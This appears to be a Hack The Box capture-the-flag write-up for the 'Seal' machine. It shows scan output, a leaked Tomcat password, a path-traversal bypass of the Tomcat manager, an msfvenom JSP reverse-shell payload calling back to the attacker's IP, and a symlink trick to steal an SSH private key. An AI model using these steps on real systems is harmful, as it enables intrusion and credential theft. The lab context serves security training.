SEAL
Scanning
NMAP
➜ ~ sudo nmap -F seal.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:24 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.16s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1.16 secondsfast scan 1.16 seconds at first ... take a look on these till deep scan finished
➜ ~ sudo nmap -T4 -p- -A seal.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 08:13 EDT
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
| 256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_ 256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after: 2022-05-05T10:24:03
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 401 Unauthorized
| Date: Thu, 19 Aug 2021 12:23:54 GMT
| Set-Cookie: JSESSIONID=node01frvnjr75rhdfsbmdepqve4n287.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date: Thu, 19 Aug 2021 12:23:52 GMT
| Set-Cookie: JSESSIONID=node05b59i0stcc6s1ffnbtlbvqhoe85.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 19 Aug 2021 12:23:53 GMT
| Set-Cookie: JSESSIONID=node01ru35o66qwp7pncfzoorb2jyt86.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Allow: GET,HEAD,POST,OPTIONS
| Content-Length: 0
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| Socks4:
| HTTP/1.1 400 Illegal character CNTL=0x4
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
| Socks5:
| HTTP/1.1 400 Illegal character CNTL=0x5
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 128.44 ms 10.10.16.1
2 228.82 ms seal.htb (10.10.10.250)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 709.02 secondsEnumeration
port 8080
register and signin
at first look we find some username root, luis, alex
scrolling news feed find this
open it ...
<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>credentials tomcat:42MrHBf*z8{Z%
try to login with it ... ERROR
try others users ... logged with luis using same password luis:42MrHBf*z8{Z%
no thing interesting here for now
port 443
Directory busting
from error page and gitbucket we know server run tomcat
➜ ~ gobuster dir -u https://seal.htb/ -w ~/SecLists/Discovery/Web-Content/tomcat.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://seal.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/x/SecLists/Discovery/Web-Content/tomcat.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/19 09:44:14 Starting gobuster in directory enumeration mode
===============================================================
/examples/%2e%2e/manager/html (Status: 403) [Size: 162]
/examples/../manager/html (Status: 403) [Size: 162]
/host-manager (Status: 302) [Size: 0] [--> http://seal.htb/host-manager/]
/host-manager/html/* (Status: 403) [Size: 162]
/manager (Status: 302) [Size: 0] [--> http://seal.htb/manager/]
/manager/html (Status: 403) [Size: 162]
/manager/html/* (Status: 403) [Size: 162]
/manager/jmxproxy (Status: 401) [Size: 2499]
/manager/jmxproxy/* (Status: 401) [Size: 2499]
/manager/status/* (Status: 401) [Size: 2499]
/manager/status.xsd (Status: 200) [Size: 4374]
===============================================================
2021/08/19 09:44:18 Finished
=============================================================== /manager/status.xsd (Status: 200) [Size: 4374]
open it try credentials tomcat:42MrHBf*z8{Z%
we IN 👏
Exploit
Trying Path Traversal
you need to know this first
https://seal.htb/manager/status/..;/html
open application manager
we can upload files here
lets generate reverse shell using msf read this
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.30 LPORT=9999 -f war -o rshell.war
set msf listener
➜ sudo msfdb run
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 10.10.16.30
lhost => 10.10.16.30
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.30:9999
we lose our path lets use burp to edit this
read this page to understand what is going under the hood
edit post request to /manager/jmxproxy/..;/html/upload
uploaded successfully
trigger it ...
we have reverse shell
Privilege Escalation
what's running here ps -aux
/bin/sh -c sleep 30 && sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.ymlcat /opt/backups/playbook/run.yml
- hosts: localhost
tasks:
- name: Copy Files
synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
- name: Server Backups
archive:
path: /opt/backups/files/
dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
- name: Clean
file:
state: absent
path: /opt/backups/files/Backup Script
let's link luis/.ssh to be backup
ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
find archive name
ls /opt/backups/archives/
copy it
cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz
unzip ...
gzip -kd rsa.gz tar -xf rsa
follow path to private key
cd dashboard
cd upload
cd .ssh
cat id_rsa
copy it to your local machine
Root User
check sudo rights
read these first ...
https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook
https://www.middlewareinventory.com/blog/ansible-command-examples/
create file with any name "root.yml"
run
-p Turned on whenever the real and effective user ids do not match. Disables processing of the $ENV file and importing of shell functions. Turning this option off causes the effective uid and gid to be set to the real uid and gid.
Last updated
